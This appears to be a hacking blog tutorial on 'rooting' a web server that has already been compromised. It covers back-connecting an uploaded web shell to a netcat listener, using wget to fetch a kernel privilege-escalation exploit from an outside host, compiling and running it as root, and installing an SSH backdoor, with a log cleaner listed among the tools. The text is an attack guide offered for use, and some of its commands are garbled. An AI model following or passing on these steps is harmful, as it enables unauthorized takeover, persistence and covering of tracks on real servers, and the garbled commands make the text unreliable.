what is rooting ?
Getting admin access to the target remote system is called rooting.
Tools required
1 “Shell Upload”
2:- “Exploit”
3:- “Log Cleaner
4:- “SSH Backdoor”
5:- “netCat”
6:- “Putty”
7:- “Brain”
GOOGLE WILL HELP TO FIND ALL THINGS ESCAPE “ BRAIN “ LOOOL
>> First of all back connect the servers
open the cmd prompt and run the netcat.
Example :
if u saved netcat in C:// Drive then
Cd C:/
Cd netcat
Cd Netcat.exe
>> Now come to the shell
Open the asp Shell in browser and click on backconnection in shell.
Then write your IP address in IP Bar and Enter the port number 2121.
And then click on connect.
Using this now you have connected your shell with server.now you can give command to the server.
>> now open the netcat window through cmd prompt and give command
Code :
==============
Nc -| -v –p 2121
==============
Then output of this command will become like this
c:\netcat>nc -l -v -p 2121
Listning On 2121
Note:
you can use any open port , it’s your choice J
2: Exploit
Now we have to find a right exploit so go to asp shell and type there this command.
code:
===============
#Uname –a
===============
Now press the Enter and you will see like this
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux
Now you can see version of server that’s kernel 2.6.34 and year 2011 for example.
Now we have to find 2.6.34 2011 Exploit. We can find it at Google or any hacking fouram.
Else J many official websites still exist lol
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
>> Using Of Exploit
How to execute exploit at server side
We have saved exploit in C: drive or root drive now we have to upload it via shell then compile it then execute. But first we have to go in TMP directory of the shell because Tmp is always writeable directory.
Well type the one of them command in shell
Code :
======================================
Cd /home/websiteusername/public_html/tmp
or
Cd /home/websiteusername/public_html/admin/tmp
or
Cd /home/websiteusername/public_html/image/tmp
=======================================
Note:
you can find tmp dir in your way.
>> Now we have to execute exploit at server side.
Code :
Wget http:// exploitwebsite.com/2011-exploits/exploitname.c
code:
======================================
http:// exploitwebsite.com/2011-exploits/exploitname.c
======================================
here you have to write the website from where you can download or get the exploit . after this command screen will look like..
code :
======================================
admin@www.target.com /home/target_username/public_html/tmp]$ wgethttp://exploitwebsite.com/2011-exploits/exploitname.c
–2011-09-22 05:12:14—http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com…199.58.192.192
Connecting to exploitwebsite.com|199.58.192.192|:80…connected.
HTTP request sent, awaiting response…200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: ‘exploitname.c’
======================================
Note:
199.58.192.192 IT’s your IP address
exploit has been saved at server side using shell J ok , now we have to set the permission of the exploit to 777.
go to cmd prompt and type
code:
======================================
Chmod 777 ExploitName.c
======================================
Now exploit is under full control at server side now we have to compile and execute the exploit.
Type commands..
Code:
======================================
gcc –o Exploit Exploitname.c
======================================
It will compile and save . now for executing the exploit type command..
Code :
======================================
./exploit
======================================
Then server will tell us that we have got root or not ? lool
For checking type command..
code:
======================================
Whoami
======================================
It will answer you ‘root’ that will look like this….
uid=xxx(root) gid=xx(root) groups=xxx(root)
Now type this command for full control
code:
======================================
su
======================================
Ok Done!
3: SSH Backdoor
>> now for installing backdoor give command….
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
======================================
>> For unzip sshdoor.zip , give command..
code:
======================================
#Unzip sshdoor.zip
======================================
>> After extraction give command..
code:
======================================
cd sshdoor
======================================
>> Then give command
Code :
======================================
./run yourpass port
======================================
Note:
At the place of yourpass, you have to give your password and at the place of port , write the port number. Then open the putty and connect with that
>> Commands used for Backdoor Installing (Nutshell)
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
#Unzip sshdoor.zip
#cd sshdoor
./run Crazyxploit 21
======================================
Thats All
Note :
You can use following commands for executing exploits J
C exploit
———————-
gcc -o exploit exploit.c
chmod +x exploit
./exploit
———————-
Perl Exploits
—————
perl exploit.pl
—————
Python
——————
python exploit.py
——————
php
—————–
php exploit.php
—————–
zip
—————-
unzip exploit.zip
./run
—————-
===============================================
For any doubt contact : (AnGeL Crew)
===============================================
0 comments:
Post a Comment